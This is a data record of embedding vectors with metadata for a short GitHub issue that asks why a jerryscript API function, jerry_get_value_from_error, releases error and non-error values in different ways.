0.011643822304904461, -0.016475409269332886, -0.012206506915390491, -0.0002604761393740773, -0.020436709746718407, 0.011058630421757698, 0.03535160422325134, 0.016850531101226807, -0.011576300486922264, 0.022357339039444923, -0.0012660406064242125, 0.0027140160091221333, 0.016370374709367752, 0.01288923155516386, -0.008215196430683136, -0.009940763004124165, -0.0036349433939903975, -0.0012604137882590294, 0.02823927067220211, 0.007539975456893444, 0.0056230961345136166, -0.023602748289704323, -0.005979462992399931, 0.01829100400209427, 0.0028284285217523575, -0.005079167429357767, 0.0010766034247353673, -0.0012669784482568502, 0.008402758277952671, -0.005724379327148199, -0.0101283248513937, -0.01860610768198967, -0.007386174518615007, -0.0013166822027415037, 0.008080152794718742, -0.004981635604053736, 0.011673832312226295, 0.014794857241213322, 0.02942465990781784, 0.01611529104411602, -0.006620923522859812, 0.0010887949028983712, 0.0056381006725132465, -0.007127339951694012, 0.015214994549751282, 0.006924773100763559, -0.002702762372791767, 0.015920225530862808, 0.01115616224706173, 0.017660798504948616, 0.0101283248513937, -0.01438222173601389, 0.010308383964002132, 0.0011713220737874508, 0.02219228446483612, 0.005506807938218117, -0.013451916165649891, 0.029874807223677635, 0.010173339396715164, 0.021201960742473602, -0.015282517299056053, 0.006879758555442095, 0.0019225061405450106, 0.011246192269027233, -0.01664046198129654, -0.015515093691647053, -0.00892793107777834, 0.003344222903251648, 0.015305024571716785, -0.007476204074919224, -0.0017668299842625856, 0.008380251005291939, 0.00886791106313467, -0.000622704450506717, -0.022402353584766388, -0.00337798404507339, -0.00010943045344902202, 0.013241847045719624, -0.000028515220037661493, -0.012401571497321129, 0.02138201892375946, 0.02540333941578865, -0.003897529561072588, -0.0193263441324234, -0.0094305956736207, 0.001758389757014811, 0.0018746779533103108, -0.016445398330688477, 0.0048465910367667675, -0.006737211719155312, 0.0025752203073352575, -0.004959127865731716, 0.0011309962719678879, -0.0043289209716022015, -0.007922600954771042, -0.010736024007201195, -0.02337767370045185, -0.0042651500552892685, 0.009325561113655567, -0.006234546657651663, 0.02861439436674118, -0.013624472543597221, 0.002273246180266142, 0.010713516734540462, 0.01779584214091301, 0.01973147690296173, 0.012026447802782059, -0.021982217207551003, 0.013902063481509686, 0.013947078958153725, 0.0015201865462586284, -0.007975118234753609, -0.015995251014828682, -0.02060176245868206, 0.006362088490277529, 0.04291408881545067, 0.006744713988155127, 0.02618359588086605, -0.02456306293606758, -0.021802157163619995, 0.001159130479209125, -0.015154975466430187, -0.010060803033411503, 0.0017865239642560482, -0.005889433436095715, 0.0071873595006763935, 0.0034286256413906813, 0.003655574982985854, -0.007892590947449207, 0.008425265550613403, 0.019401369616389275, 0.007097329944372177, 0.012033950537443161, -0.011906408704817295, 0.017900876700878143, 0.020031575113534927, -0.012244019657373428, 0.01664046198129654, -0.007990122772753239, -0.015785181894898415, 0.01274668425321579, 0.011681335046887398, 0.019506404176354408, -0.005131684709340334, -0.01929633505642414, 0.009355571120977402, 0.0038375097792595625, -0.036702048033475876, 0.007254881784319878, 0.003604933386668563, -0.00824520643800497, 0.0019994063768535852, 0.026108570396900177, 0.0017330689588561654, -0.01970146782696247, 0.016760502010583878, 0.0001920161594171077, 0.021607093513011932, -0.0038525147829204798, -0.01898123137652874, 0.0030647560488432646, -0.013744511641561985, 0.004287657327950001, -0.0015004925662651658, -0.008335236459970474, 0.032680727541446686, 0.0031341537833213806, 0.013631975278258324, -0.001648666220717132, 0.019746482372283936, -0.036071840673685074, 0.003355476539582014, -0.011921413242816925, 0.005469295661896467, 0.004584004636853933, 0.006178278010338545, 0.017210649326443672, -0.012491600587964058, -0.001331687206402421, -0.0075099654495716095, -0.01393207348883152, -0.020766817033290863, -0.008155177347362041, 0.015057442709803581, -0.008365246467292309, 0.006658435799181461, -0.011178669519722462, -0.004512731451541185, -0.011231186799705029, -0.008672847412526608, 0.02219228446483612, 0.006035731639713049, -0.014044610783457756, 0.013549447990953922, -0.012971758842468262, 0.010540960356593132, 0.0002513325016479939, 0.0018962475005537271, 0.02109692618250847, 0.00048578446148894727, 0.005563076119869947, -0.013842044398188591, 0.013654482550919056, -0.004351428709924221, -0.01785586215555668, 0.0013166822027415037, 0.009873241186141968, 0.00908548291772604, 0.015395053662359715, 0.0001291830267291516, -0.0100533002987504, -0.0010991108138114214, -0.020736807957291603, -0.013421906158328056, -0.008185187354683876, -0.010278373956680298, -0.020871851593255997, 0.005094172433018684, 0.006947280839085579, 0.02013660967350006, 0.008050142787396908, -0.007408682256937027, -0.0002222604671260342, -0.005341753829270601, 0.0016055270098149776, 0.009513122960925102, 0.015214994549751282, -0.0074536968022584915, 0.018876196816563606, 0.00011845685367006809, -0.01727066934108734, 0.012161492370069027, 0.02190719172358513, -0.006084497552365065, -0.011598807759582996, 0.014652309939265251, 0.021652108058333397, -0.025598403066396713, 0.005728130228817463, 0.0035786747466772795, -0.0010522204684093595, -0.027158915996551514, -0.0003505056956782937, 0.003407993819564581, 0.010368403978645802, 0.00585942342877388, -0.0025789716746658087, -0.007877586409449577, -0.006320824846625328, -0.004835337400436401, 0.004025071393698454, 0.004606512375175953, 0.018155960366129875, 0.005247972905635834, 0.0074461945332586765, 0.0017921507824212313, 0.018276000395417213, 0.01296425610780716, -0.02817925065755844, -0.005829413887113333, -0.02667875774204731, -0.0018999987514689565, -0.007427438162267208, -0.030970167368650436, -0.01312180794775486, 0.010330891236662865, -0.006500883959233761, 0.0017490116879343987, -0.01391706895083189, 0.003391113132238388, 0.023332659155130386, 0.014652309939265251, 0.005109177436679602, -0.02636365406215191, -0.00306663173250854, 0.015260010026395321, 0.020811831578612328, -0.012491600587964058, 0.013099300675094128, -0.018095940351486206, -0.014314698986709118, 0.0023501464165747166, -0.004977884236723185, 0.008207694627344608, 0.009393083862960339, 0.009903251193463802, -0.002337017096579075, -0.011403743177652359, -0.0031979249324649572, 0.030490009114146233, 0.004493975080549717, -0.0020387943368405104, -0.02210225537419319, 0.022447368130087852, 0.003569296794012189, 0.007870083674788475, -0.009228029288351536, 0.004411448258906603, 0.003983807750046253, -0.011193674989044666, 0.01170384231954813, 0.0024420516565442085, 0.009265542030334473, -0.008920428343117237, 0.015425063669681549, 0.015305024571716785, 0.018321014940738678, -0.010203349404036999, 0.011441255919635296, 0.012484097853302956, 0.01695556566119194, -0.007547477725893259, 0.0007221120758913457, -0.0064783766865730286, -0.010736024007201195, 0.020826837047934532, -0.0036236895248293877, -0.010818551294505596, 0.01335438434034586, -0.0029090798925608397, 0.020331675186753273, -0.021562078967690468, 0.007183608133345842, -0.008207694627344608, 0.018065931275486946, -0.008222699165344238, 0.029619723558425903, 0.0037005897611379623, 0.004295160062611103, 0.016505418345332146, 0.009595650248229504, -0.021397024393081665, 0.003488645190373063, 0.02381281740963459, -0.0030366219580173492, -0.015590118244290352, -0.023392679169774055, 0.012461590580642223, -0.007281140424311161, -0.019011240452528, 0.005360509734600782, 0.02256740815937519, -0.026063555851578712, -0.02013660967350006, 0.0003425343311391771, 0.007982620969414711, 0.011786369606852531, -0.0013016773154959083, 0.02453305386006832, 0.03565170243382454, 0.015169980004429817, -0.009438098408281803, -0.007374920882284641, 0.013001767918467522, -0.008117664605379105, -0.007937605492770672, -0.021922197192907333, -0.03487144783139229, -0.0023201366420835257, 0.005904438439756632, 0.012881728820502758, 0.014982418157160282, -0.017990905791521072, -0.014772349037230015, 0.0016299100825563073, 0.010901078581809998, 0.023707782849669456, 0.008912925608456135, -0.0027346478309482336, 0.009423093870282173, 0.01889120228588581, 0.0008168306667357683, 0.002723393961787224, -0.008845403790473938, 0.0008013568003661931, 0.017225654795765877, 0.016685478389263153, -0.0110661331564188, 0.012214009650051594, 0.013496930710971355, 0.006744713988155127, 0.008882916532456875, 0.00648212805390358, -0.000934525509364903, -0.015635132789611816, -0.00020303540804889053, 0.00995576847344637, -0.0028096723835915327, -0.002704637823626399, 0.006519640330225229, 0.009858236648142338, 0.020001566037535667, 0.02583848312497139, 0.009738196618855, -0.000657403317745775, 0.010165837593376637, -0.0018615486333146691, 0.013054285198450089, -0.014502260833978653, 0.009850733913481236, 0.008177684620022774, -0.010668502189218998, 0.004771566484123468, 0.001908438978716731, 0.003430501092225313, 0.03310086578130722, -0.02424795925617218, -0.010413418523967266, -0.023212620988488197, 0.024668097496032715, 0.012041453272104263, -0.018411044031381607, 0.01736069843173027, -0.007618750911206007, 0.008095157332718372, -0.000005326455720933154, 0.0052592265419662, 0.013429408892989159, -0.016250334680080414, 0.010248363949358463, -0.011463763192296028, 0.018185969442129135, 0.010728522203862667, -0.00574313523247838, 0.007464950438588858, -0.004955376964062452, -0.002473937114700675, 0.013196832500398159, -0.03364104405045509, 0.003252317663282156, -0.008140171878039837, -0.015965241938829422, -0.004246394149959087, 0.0025208275765180588, -0.024953192099928856, 0.005285485181957483, 0.0015248756390064955, -0.018381034955382347, -0.008095157332718372, 0.005919443443417549, -0.018681133165955544, -0.006545898970216513, -0.006197034381330013, 0.008875413797795773, 0.0062120393849909306, -0.02667875774204731, 0.006140765734016895, -0.018125951290130615, 0.016340363770723343, -0.005390519741922617, 0.008215196430683136, -0.01895122043788433, -0.017615782096982002, -0.011711345054209232, -0.0043289209716022015, 0.005889433436095715, 0.005353007465600967, -0.018591102212667465, 0.021592088043689728, 0.0025752203073352575, 0.017840856686234474, -0.008777881972491741, -0.0037924950011074543, 0.039132848381996155, -0.010090813040733337, 0.00442645326256752, 0.03799247369170189, 0.008177684620022774, 0.012101472355425358, 0.0012772943591699004, -0.0029165823943912983, 0.01580018736422062, -0.0005542444414459169, -0.0018315387424081564, 0.011006113141775131, 0.008612827397882938, 0.00808765459805727, 0.002503946889191866, -0.01535003911703825, 0.00832023099064827, 0.009528127498924732, 0.009145502001047134, 0.0007882275385782123, -0.007247379049658775, 0.018771162256598473, 0.0008684101048856974, -0.04099345579743385, 0.011148659512400627, -0.0015389426844194531, -0.0035786747466772795, -0.0064033521339297295, -0.011433753184974194, 0.012521610595285892, -0.0077125318348407745, 0.03244065120816231, -0.014277187176048756, -0.016730492934584618, -0.02543334849178791, 0.005536817479878664, 0.016250334680080414, -0.0007474328740499914, -0.0008022946421988308, 0.002196345943957567, 0.016910551115870476, -0.008860408328473568, -0.0028528114780783653, -0.008342739194631577, 0.012709172442555428, -0.00700354902073741, -0.01829100400209427, -0.0007516529876738787, 0.0007661890122108161, -0.0011910159373655915, 0.01667047291994095, -0.009423093870282173, 0.0011797623010352254, -0.008275216445326805, 0.018215980380773544, 0.004809078760445118, -0.013857048936188221, -0.009505620226264, 0.0026427425909787416, -0.0182309839874506, -0.014584788121283054, 0.003441754961386323, 0.006845997180789709, 0.00823020190000534, 0.018801171332597733, -0.005720627959817648, -0.0077125318348407745, -0.006122009828686714, 0.01661045290529728, -0.00018873382941819727, -0.019656453281641006, -0.010743526741862297, -0.019686462357640266, -0.000136919945362024, 0.030535023659467697, -0.02468310296535492, 0.05158693343400955, -0.00037981217610649765, 0.015815190970897675, 0.00704481266438961, -0.0015717659844085574, 0.001205083099193871, 0.0015061193844303489, -0.01535003911703825, -0.02994983270764351, 0.007401179522275925, 0.006013223901391029, -0.009453102946281433, -0.003096641506999731, 0.0018868694314733148, 0.002562090987339616, 0.011606310494244099, -0.004287657327950001, 0.0039050320629030466, -0.007224871776998043, -0.01745072938501835, -0.012581630609929562, -0.006005721632391214, -0.0006963223568163812, -0.0023614002857357264, 0.013241847045719624, 0.008770379237830639, 0.013204334303736687, 0.017090611159801483, 0.014704827219247818, -0.028509359806776047, 0.010450931265950203, 0.008627831935882568, 0.0096631720662117, -0.005668110679835081, 0.022417359054088593, 0.0071310908533632755, 0.003591804066672921, 0.01574016734957695, -0.0025133250746876, -0.015545102767646313, 0.023917851969599724, 0.006178278010338545, -0.0005378327914513648, -0.006913519464433193, -0.01805092580616474, -0.0060244775377213955, -0.01976148784160614, -0.01210897509008646, -0.004895356949418783, -0.00852279830724001, -0.01658044382929802, 0.005668110679835081, -0.01488488633185625, 0.010315886698663235, 0.0006269245641306043, -0.007862580940127373, -0.013691994361579418, -0.010450931265950203, -0.016910551115870476, -0.008275216445326805, 0.009175512008368969, 0.00012226670514792204, -0.009220526553690434, 0.006962285377085209, -0.01488488633185625, 0.0038318829610943794, 0.005446787923574448, -0.002790916245430708, 0.010811049491167068, -0.013857048936188221, 0.008050142787396908, 0.011853891424834728, -0.01895122043788433, -0.0038712709210813046, 0.004261399153620005, -0.015950236469507217, 0.005473046563565731, 0.013031777925789356, -0.017120620235800743, -0.007329906336963177, 0.013009270653128624, 0.0013813909608870745, 0.015057442709803581, -0.010420921258628368, -0.01195142325013876, 0.004497726447880268, -0.008995452895760536, -0.0103609012439847, -0.013549447990953922, 0.016535427421331406, 0.019236315041780472, -0.01866612769663334, -0.016730492934584618, -0.006819739006459713, -0.014997423626482487, -0.010158334858715534, -0.018846187740564346, 0.005791901145130396, 0.00808765459805727, 0.0035149038303643465, -0.015980245545506477, 0.008845403790473938, -0.006294566206634045, 0.004689039196819067, 0.0015305024571716785, -0.005956955719739199, -0.012596635147929192, -0.006665938533842564, -0.02100689709186554, -0.0002410166198387742, 0.0026033546309918165, 0.017630787566304207, -0.0029165823943912983, -0.0037568584084510803, 0.0037868681829422712, 0.007787556387484074, -0.01667047291994095, 0.019371358677744865, -0.00024359559756703675, -0.007326154969632626, 0.0015361292753368616, 0.009633162058889866, 0.005574329756200314, 0.0009181139175780118, 0.029259605333209038, 0.006234546657651663, 0.02982979267835617, 0.022147269919514656, -0.022582413628697395, 0.016715487465262413, 0.006215790752321482, -0.014097128063440323, -0.02627362497150898, -0.005773145239800215, 0.024352993816137314, 0.016070276498794556, -0.003822504775598645, 0.0014929900644347072, 0.01232654694467783, 0.012431581504642963, -0.028659408912062645, 0.01354194525629282, -0.0017349445261061192, -0.008845403790473938, -0.027654077857732773, -0.0058969357050955296, -0.0010831680847331882, 0.002006908878684044, 0.013204334303736687, -0.017930885776877403, 0.011733852326869965, 0.009550635702908039, 0.023602748289704323, -0.002599603496491909, -0.02534331940114498, 0.020766817033290863, 0.0035036501940339804, 0.00885290652513504, -0.009640664793550968, 0.005247972905635834, -0.004471467807888985, -0.011621315032243729, -0.005004142876714468, -0.0007929165731184185, 0.009513122960925102, -0.006272058933973312, 0.0009429657948203385, 0.005713125690817833, -0.0021306995768100023, -0.013631975278258324, 0.005836916156113148, -0.010953595861792564, 0.009445601142942905, -0.0057656429708004, -0.001902812160551548, 0.010826054029166698, 0.0004810954269487411, -0.007176105864346027, 0.007847576402127743, 0.002841557841747999, 0.026468688622117043, 0.003091014688834548, -0.025823477655649185, 0.006635928526520729, 0.0007821317412890494, -0.011463763192296028, -0.0035186551976948977, 0.01430719718337059, -0.0012866724282503128, 0.002145704347640276, -0.0021775898057967424, -0.004250145051628351, 0.009865738451480865, -0.01661045290529728, -0.002854687161743641, 0.011493773199617863, 0.0023951611947268248, -0.005322997458279133, 0.013909566216170788, -0.019026245921850204, -0.00040442965109832585, -0.0004602292028721422, 0.00026844750391319394, 0.040783386677503586 ]
1,781
null
null
null
null
null
null
null
null
null
[ "jerryscript-project", "jerryscript" ]
https://github.com/jerryscript-project/jerryscript/blob/ba06d492a340bee7d82ff9595851cd278b7bd572/jerry-core/api/jerry.c#L1625-L1642 Seems not consistence
Why jerry_get_value_from_error release error/non-error value in different way?
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4553/comments
4
2021-01-29T14:01:48
2021-02-04T12:43:47Z
https://github.com/jerryscript-project/jerryscript/issues/4553
796,906,609
4,553
false
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : Why jerry_get_value_from_error release error/non-error value in different way? Issue date: --- start body --- https://github.com/jerryscript-project/jerryscript/blob/ba06d492a340bee7d82ff9595851cd278b7bd572/jerry-core/api/jerry.c#L1625-L1642 Seems not consistence --- end body ---
359
[ -0.008304066024720669, 0.01651844009757042, -0.015980282798409462, 0.02725168876349926, 0.015367381274700165, 0.027117149904370308, -0.007960244081914425, 0.027072302997112274, -0.04356084391474724, -0.0032999508548527956, 0.018925199285149574, 0.009275739081203938, 0.014395708218216896, 0.016922058537602425, 0.018327245488762856, 0.007291284389793873, -0.005841249134391546, 0.009350483305752277, -0.01025488693267107, 0.004772408865392208, 0.014313490130007267, 0.018177758902311325, 0.014597517438232899, 0.028387797996401787, -0.026863019913434982, -0.009343008510768414, -0.0023899415973573923, -0.007915397174656391, -0.01488901861011982, -0.014119154773652554, 0.008005090057849884, 0.004895736463367939, -0.0056768120266497135, 0.0040100193582475185, 0.00720159150660038, -0.004084763582795858, 0.035279203206300735, 0.050467196851968765, -0.007721062749624252, -0.002457211259752512, -0.006005686242133379, -0.007478144485503435, -0.01985202543437481, 0.04341135546565056, -0.008094782941043377, 0.0672098696231842, 0.028043976053595543, 0.02021079696714878, -0.026833122596144676, 0.0016368951182812452, -0.009410278871655464, -0.03058527410030365, 0.021302061155438423, -0.0408700592815876, 0.018327245488762856, -0.0052059246227145195, 0.0070521030575037, -0.028537286445498466, 0.0006058941362425685, -0.000973541522398591, -0.02755066566169262, 0.002696392359212041, -0.03925558552145958, 0.0019059738842770457, -0.00023801314819138497, 0.0521414652466774, -0.05238064378499985, 0.01003065425902605, 0.01925407350063324, 0.019418509677052498, 0.012586901895701885, 0.022991277277469635, 0.03474104404449463, 0.061589114367961884, -0.02828315645456314, 0.01650349050760269, 0.011346150189638138, 0.02028554119169712, 0.00462665781378746, -0.020689159631729126, -0.015255264937877655, 0.006465362384915352, 0.0039763846434652805, -0.003137382445856929, -0.003972647245973349, -0.04122883081436157, 0.0009613956208340824, -0.05250023677945137, 0.0016639898531138897, 0.030106911435723305, -0.02348458766937256, 0.008984236977994442, -0.011846935376524925, -0.023439740762114525, 0.0269527118653059, -0.004006282426416874, 0.001413597259670496, 0.013453932479023933, -0.03000226989388466, -0.03515961021184921, 0.044995930045843124, 0.03844834864139557, -0.02474028803408146, 0.0011641388991847634, 0.02050977386534214, 0.03856794163584709, 0.04125872626900673, -0.0024086276534944773, 0.042604122310876846, 0.09842299669981003, 0.02170567773282528, 0.028896057978272438, -0.022707248106598854, -0.060751982033252716, -0.020569568499922752, 0.0017835804028436542, 0.0365946963429451, -0.03133271634578705, 0.007878025062382221, -0.01148068904876709, -0.052470337599515915, 0.009903589263558388, -0.03991333395242691, 0.00168921600561589, -0.014709632843732834, 0.046311426907777786, 0.033724524080753326, -0.007907922379672527, 0.013969667255878448, -0.014903968200087547, -0.03707306087017059, -0.017759190872311592, 0.028626980260014534, -0.01599523052573204, 0.009791472926735878, 0.008266693912446499, 0.00034639204386621714, 0.02185516618192196, -0.02777489647269249, -0.04592275619506836, -0.019672639667987823, -0.04619183763861656, 0.039733950048685074, 0.0016294207889586687, -0.0005348872509784997, -0.026384657248854637, 0.017953526228666306, 0.00955229252576828, 0.005198450293391943, -0.004593023099005222, -0.002731895772740245, -0.03934527933597565, 0.028477491810917854, -0.0027786109130829573, 0.02762540802359581, -0.0045369649305939674, -0.0075603630393743515, 0.013483830727636814, -0.0016976246843114495, -0.0006680251681245863, -0.036176130175590515, -0.018342195078730583, -0.012272976338863373, 0.015756050124764442, -0.04116903617978096, 0.008356386795639992, -0.00009033521928358823, 0.02562226727604866, -0.01940356008708477, 0.028088822960853577, -0.030704865232110023, 0.0014733924763277173, 0.015905538573861122, 0.05946638435125351, -0.027281586080789566, -0.015442125499248505, 0.027087250724434853, 0.01429854054003954, -0.01010539848357439, -0.038986507803201675, 0.00012554667773656547, 0.004320207517594099, -0.02903059683740139, -0.033216264098882675, 0.00877495389431715, -0.052470337599515915, -0.00612901384010911, -0.023275304585695267, 0.02348458766937256, 0.0006348574534058571, -0.018970046192407608, -0.007354816421866417, 0.022976327687501907, -0.005837512202560902, 0.025876397266983986, 0.014657312072813511, -0.0012575689470395446, -0.06332317739725113, -0.008162052370607853, 0.012788711115717888, 0.06140973046422005, -0.001339787500910461, -0.030704865232110023, -0.007773383520543575, -0.013012942858040333, -0.04030200466513634, 0.01103969942778349, -0.010053077712655067, -0.025786705315113068, -0.03375442326068878, -0.008752530440688133, -0.02213919349014759, 0.03127291798591614, -0.015935435891151428, 0.010269835591316223, 0.0031616741325706244, 0.030121861025691032, 0.03605654090642929, -0.011757242493331432, -0.019448406994342804, -0.0027617935556918383, -0.004353842232376337, -0.02613052725791931, 0.007508041802793741, -0.01139847096055746, -0.017759190872311592, -0.005901044234633446, -0.007907922379672527, -0.014612466096878052, 0.017714345827698708, -0.011234033852815628, -0.011839460581541061, -0.05925710126757622, -0.019807178527116776, -0.023230457678437233, 0.013708062469959259, -0.02526349574327469, 0.0048359413631260395, -0.017295777797698975, -0.0025095322635024786, -0.015681305900216103, -0.006229918450117111, -0.03459155559539795, -0.019567998126149178, -0.020390182733535767, 0.0068727172911167145, -0.008154578506946564, -0.05052699148654938, -0.012713966891169548, 0.017370522022247314, -0.0023394895251840353, -0.030525479465723038, -0.010935057885944843, -0.016309157013893127, 0.0052582453936338425, 0.01399208977818489, 0.005669337697327137, 0.038029782474040985, 0.010897685773670673, -0.03626582399010658, 0.024560902267694473, 0.035129714757204056, -0.01077062077820301, -0.018177758902311325, 0.01822260394692421, -0.008550722151994705, -0.058390069752931595, -0.0040137567557394505, -0.017579805105924606, 0.027221791446208954, 0.05901791900396347, -0.038029782474040985, -0.035069920122623444, 0.03411319479346275, -0.0055908565409481525, 0.026265066117048264, 0.0009011332294903696, 0.04203606769442558, -0.0014621808659285307, 0.003634430468082428, -0.007306233048439026, 0.030794557183980942, 0.023155713453888893, 0.012168334797024727, -0.005112494342029095, -0.011921679601073265, 0.028612030670046806, -0.006158911623060703, -0.04119893163442612, -0.031870871782302856, -0.008363861590623856, -0.028701722621917725, -0.004118398297578096, 0.004507067613303661, -0.02279694192111492, -0.008819800801575184, 0.0014042542316019535, -0.010479118674993515, 0.005284405779093504, 0.011234033852815628, -0.022303631529211998, -0.03955456241965294, -0.012272976338863373, -0.01495628897100687, -0.027460971847176552, 0.007175430655479431, 0.014679735526442528, 0.01882055774331093, 0.0055235871113836765, -0.01351372804492712, 0.052829109132289886, 0.022841788828372955, -0.0007437035092152655, -0.03701326251029968, -0.008012564852833748, 0.0028477490413933992, 0.028313053771853447, 0.022841788828372955, -0.024022744968533516, 0.019283970817923546, -0.022542811930179596, -0.0035690295044332743, -0.019089635461568832, -0.005056436639279127, 0.02843264490365982, 0.014425605535507202, -0.025906294584274292, -0.01687721163034439, -0.02910534106194973, -0.03169148787856102, -0.0030551638919860125, -0.03650500625371933, -0.013349290937185287, -0.0035297886934131384, -0.05411470681428909, -0.04670009762048721, -0.05309818685054779, -0.003219600999727845, 0.004622920881956816, -0.06272522360086441, 0.0004045522946398705, -0.008797377347946167, -0.03811947628855705, 0.024112436920404434, 0.012429938651621342, -0.03375442326068878, -0.012048744596540928, 0.028118720278143883, 0.020629363134503365, -0.005377836059778929, 0.0008670312236063182, 0.028716672211885452, 0.022228887304663658, 0.004966743756085634, 0.01702670007944107, 0.002440393902361393, -0.03178117796778679, -0.023006225004792213, 0.06942229717969894, 0.011869358830153942, 0.01991182006895542, -0.005744081921875477, -0.0011155552929267287, -0.011331201530992985, 0.029792986810207367, -0.007900448516011238, 0.01207116711884737, -0.012788711115717888, -0.016757620498538017, -0.014358336105942726, 0.005702972877770662, 0.000019532728401827626, 0.0056431773118674755, -0.0032270753290504217, -0.005142392124980688, 0.020898442715406418, 0.011331201530992985, 0.015090827830135822, -0.01096495520323515, 0.041737090796232224, -0.007706113625317812, -0.01473205629736185, -0.015935435891151428, -0.054921943694353104, -0.022781992331147194, 0.0019246598239988089, 0.015935435891151428, 0.034322477877140045, 0.03219974786043167, -0.016428746283054352, -0.020405132323503494, 0.01569625549018383, -0.015255264937877655, -0.05435388907790184, -0.025816602632403374, 0.018237553536891937, 0.005844986531883478, -0.016174616292119026, 0.027730051428079605, -0.003159805666655302, -0.01858137547969818, -0.032708004117012024, 0.018401989713311195, -0.012855980545282364, -0.028686774894595146, 0.015150623396039009, -0.03539879247546196, -0.02496452070772648, 0.02584649994969368, 0.025562472641468048, 0.002053593285381794, 0.009021609090268612, 0.00806488562375307, 0.02642950415611267, 0.02200465463101864, -0.015935435891151428, -0.0017873175675049424, -0.0023787301033735275, -0.007795806508511305, 0.012325297109782696, -0.011652600951492786, -0.03103373944759369, 0.000307151407469064, 0.01277376152575016, -0.000052671213779831305, -0.02036028541624546, -0.042394839227199554, -0.0011790876742452383, 0.02021079696714878, -0.03264820948243141, -0.04362063854932785, 0.00040385156171396375, 0.03127291798591614, 0.025951141491532326, 0.02073400467634201, -0.041497908532619476, -0.027819743379950523, -0.033874012529850006, 0.009686831384897232, -0.03970405086874962, 0.050018731504678726, 0.06152931973338127, -0.019313868135213852, -0.011248982511460781, -0.029449164867401123, 0.014500349760055542, -0.05411470681428909, -0.0027935595717281103, -0.011936628259718418, 0.002477766014635563, -0.003051426727324724, 0.027595510706305504, 0.004495855886489153, 0.00433141877874732, 0.011136867105960846, 0.01805816777050495, -0.037431832402944565, -0.011428368277847767, 0.030450735241174698, 0.02154124155640602, -0.0034101982600986958, -0.00020321043848525733, -0.005392784718424082, 0.014388233423233032, -0.015875641256570816, 0.011824511922895908, 0.020838648080825806, -0.0047836205922067165, -0.0011669418308883905, -0.028328003361821175, 0.013125059194862843, -0.012855980545282364, -0.025233598425984383, 0.016533387824892998, -0.030674967914819717, -0.0026104366406798363, -0.006214969325810671, -0.0027449759654700756, 0.022901583462953568, -0.010359528474509716, 0.013850076124072075, -0.04583306610584259, -0.027311483398079872, 0.05785191059112549, 0.010748197324573994, -0.02324540540575981, 0.061290137469768524, 0.014836697839200497, 0.004514541942626238, -0.009417752735316753, 0.008685261011123657, 0.007141795940697193, -0.007870551198720932, -0.029449164867401123, -0.02206444926559925, 0.0022105558309704065, -0.039524663239717484, -0.032977085560560226, 0.0037932617124170065, -0.03324616327881813, 0.03596684709191322, -0.0391060970723629, 0.02303612232208252, 0.013857550919055939, 0.0010417455341666937, -0.00014668524090666324, -0.034322477877140045, 0.05321777984499931, -0.012340245768427849, -0.059436485171318054, -0.0056244912557303905, -0.053576551377773285, -0.013850076124072075, -0.014971237629652023, -0.009724203497171402, -0.021645883098244667, -0.026937764137983322, 0.009671882726252079, 0.01852158084511757, 0.02502431534230709, -0.013282021507620811, -0.011106968857347965, 0.00745945842936635, 0.043800026178359985, 0.021242264658212662, 0.0038455824833363295, -0.010583760216832161, -0.014657312072813511, -0.03288739174604416, -0.04320207238197327, -0.0095223942771554, 0.021885063499212265, 0.00451827934011817, 0.038538042455911636, 0.0032924762926995754, -0.0008679655147716403, 0.005564696155488491, 0.04215565696358681, 0.0037895245477557182, 0.00009938625589711592, -0.00583377480506897, 0.04924139380455017, -0.0031504626385867596, 0.012205706909298897, 0.01425369456410408, 0.02101803384721279, -0.021735576912760735, 0.015060930512845516, 0.017804037779569626, 0.03593694791197777, -0.000623178668320179, -0.009186046198010445, -0.009156148880720139, 0.02146649733185768, 0.0014051885809749365, -0.016324104741215706, -0.023723768070340157, 0.047656819224357605, -0.016638031229376793, -0.030854353681206703, 0.0015163703355938196, 0.03399360552430153, 0.013745434582233429, 0.0055945939384400845, -0.0003157937026116997, -0.040331900119781494, -0.012616799212992191, 0.022572709247469902, -0.0401226170361042, -0.007336130831390619, -0.00995591003447771, -0.05160330608487129, 0.01687721163034439, -0.024545952677726746, -0.0030775871127843857, -0.008946865797042847, -0.028462542220950127, 0.004353842232376337, -0.0009632642031647265, -0.0260707326233387, 0.014522773213684559, -0.0019227912416681647, 0.00256559019908309, 0.02672847919166088, -0.014709632843732834, -0.020719056949019432, 0.004652818664908409, -0.019508203491568565, -0.0018686017720028758, -0.040391694754362106, -0.00749683054164052, -0.019074687734246254, -0.0008740384946577251, 0.014522773213684559, 0.03294718638062477, -0.042095862329006195, -0.01961284503340721, 0.021302061155438423, 0.04403920844197273, -0.009118776768445969, 0.0022722198627889156, 0.009978333488106728, 0.01665297895669937, -0.017221033573150635, -0.002107782755047083, 0.00044379293103702366, -0.006577478256076574, -0.003070112783461809, 0.001451903604902327, 0.015412227250635624, 0.005605805199593306, 0.01426116842776537, 0.016907108947634697, -0.008027513511478901, -0.016907108947634697, -0.0005900110118091106, -0.004353842232376337, 0.03892671316862106, 0.00638688076287508, 0.027042405679821968, 0.025861449539661407, -0.021287111565470695, 0.024904724210500717, -0.03243892639875412, -0.006726966239511967, 0.03545858711004257, -0.028447594493627548, -0.023364996537566185, 0.0006357917445711792, -0.0002459547249600291, -0.00017237850988749415, -0.012190758250653744, -0.014313490130007267, -0.013708062469959259, 0.024306772276759148, 0.05279921367764473, 0.02030049078166485, 0.010912634432315826, 0.006865242961794138, -0.00546379154548049, -0.024994418025016785, 0.004017493687570095, -0.020748954266309738, -0.007706113625317812, 0.002113388618454337, -0.032708004117012024, 0.018835505470633507, 0.0498991422355175, -0.025652164593338966, -0.030047116801142693, -0.033066775649785995, -0.020016461610794067, -0.0166679285466671, 0.009499971754848957, -0.00444353511556983, 0.007433298043906689, 0.019971616566181183, -0.0028159827925264835, -0.013386663049459457, -0.011495638638734818, -0.019059738144278526, -0.0028982013463974, 0.014747004956007004, -0.02272219769656658, 0.01559161301702261, -0.013521202839910984, 0.006663434207439423, 0.0128485057502985, -0.011248982511460781, 0.03764111548662186, 0.01284103188663721, -0.005897307302802801, 0.016055027022957802, 0.011121917515993118, -0.007100686896592379, 0.01022498868405819, -0.0025954879820346832, -0.030346093699336052, -0.006427990272641182, 0.014051885344088078, -0.02665373682975769, -0.003838108154013753, 0.006809184793382883, 0.016563287004828453, 0.017490113154053688, 0.005105020012706518, -0.027206841856241226, -0.0037353350780904293, 0.010778095573186874, 0.006842819973826408, -0.013169905170798302, 0.005060173571109772, 